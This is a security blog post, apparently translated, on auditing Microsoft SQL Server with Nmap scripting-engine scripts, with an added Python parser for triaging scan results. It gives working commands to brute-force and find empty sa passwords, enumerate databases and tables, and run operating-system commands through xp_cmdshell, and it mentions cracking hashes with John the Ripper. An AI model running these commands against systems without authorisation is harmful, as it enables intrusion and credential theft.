The Nmap Scripting Engine (NSE) allows us to use Nmap not only as a port scanner but as a complete penetration testing platform.
In this post we will look at some techniques we can apply to audit our own network for weak Microsoft SQL Server configurations.
Generally, SQL Server databases listen on port 1433 by default.
Opening a terminal, we can run the following command:
nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx (the IP address of the SQL Server)
The combination of Nmap and the Nmap Scripting Engine immediately gives us information about the SQL Server version as well as the instance name.
The Nmap Scripting Engine also includes ms-sql-brute, which checks for weak passwords.
The command is nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx. If this finds nothing, we can supply a custom password list; assuming the file with the passwords is pass.txt, the command becomes:
nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx
At the same time, the Nmap Scripting Engine gives us the ability to find empty passwords on infrastructures running Microsoft SQL Server.
The command would be as follows:
nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account has no password. To find which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:
nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa xxx.xxx.xxx.xxx
Then we list the tables in those databases with the following command:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL Server 2000) xp_cmdshell is enabled by default, and we can execute operating system commands through Nmap scripts such as:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx
Next:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx
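When the checks above are run over a whole subnet (with -oX to save XML), the results are easier to triage from Nmap's XML output than from the screen. The following is an added example, not code from the original post or from the Nmap project: it parses the output of the ms-sql-info and ms-sql-empty-password scripts and lists the hosts that need attention. The XML excerpt is constructed, and the regexes assume the documented output layout of those two scripts.

```python
import re
import xml.etree.ElementTree as ET

# Constructed nmap -oX excerpt (not a real scan): two hosts scanned with the
# ms-sql-info and ms-sql-empty-password scripts. Nmap keeps each script's text in
# the `output` attribute with newlines encoded as &#xa;; the layout mimics the
# documented NSE output, so adjust the regexes if your Nmap version differs.
SAMPLE_XML = r"""<?xml version="1.0"?>
<nmaprun scanner="nmap">
<host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
<script id="ms-sql-info" output="&#xa;  192.0.2.10\MSSQLSERVER:&#xa;    Instance name: MSSQLSERVER&#xa;    Version:&#xa;      name: Microsoft SQL Server 2000 SP4&#xa;      number: 8.00.2039&#xa;    TCP port: 1433"/>
<script id="ms-sql-empty-password" output="&#xa;  [192.0.2.10\MSSQLSERVER]&#xa;    sa:&lt;empty&gt; =&gt; Login Success"/>
</port></ports></host>
<host><address addr="192.0.2.11" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/>
<script id="ms-sql-info" output="&#xa;  192.0.2.11\MSSQLSERVER:&#xa;    Version:&#xa;      name: Microsoft SQL Server 2019 RTM&#xa;      number: 15.00.2000"/>
<script id="ms-sql-empty-password" output="&#xa;  [192.0.2.11\MSSQLSERVER]&#xa;    No credentials found"/>
</port></ports></host>
</nmaprun>"""

# "name: <product>" line of ms-sql-info, and "<user>:<empty> => Login Success"
# lines of ms-sql-empty-password (the XML parser has already decoded &lt;/&gt;).
VERSION_RE = re.compile(r"^\s*name:\s*(.+?)\s*$", re.M)
EMPTY_LOGIN_RE = re.compile(r"^\s*(\S+):<empty>\s*=>\s*Login Success", re.M)


def audit_mssql(xml_text):
    """Map each IPv4 host to its SQL Server product string and password-less logins."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        entry = {"version": None, "empty_password_logins": []}
        for script in host.iter("script"):
            out = script.get("output", "")
            if script.get("id") == "ms-sql-info":
                m = VERSION_RE.search(out)
                entry["version"] = m.group(1) if m else None
            elif script.get("id") == "ms-sql-empty-password":
                entry["empty_password_logins"] += EMPTY_LOGIN_RE.findall(out)
        findings[addr.get("addr")] = entry
    return findings


def hosts_needing_attention(findings):
    """Hosts with a password-less login or an end-of-life SQL Server 2000 build
    (where, as noted above, xp_cmdshell is enabled by default)."""
    return sorted(h for h, f in findings.items()
                  if f["empty_password_logins"] or "SQL Server 2000" in (f["version"] or ""))
```

Run the real scan with nmap -p1433 --script ms-sql-info,ms-sql-empty-password -oX scan.xml <range> and pass the file contents to audit_mssql.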
We should also mention that Nmap and the Nmap Scripting Engine can be combined with other tools such as John the Ripper. With John the Ripper we can take the extracted database password hashes and proceed with password cracking.
We warmly thank the SecTeam, @johnzontos.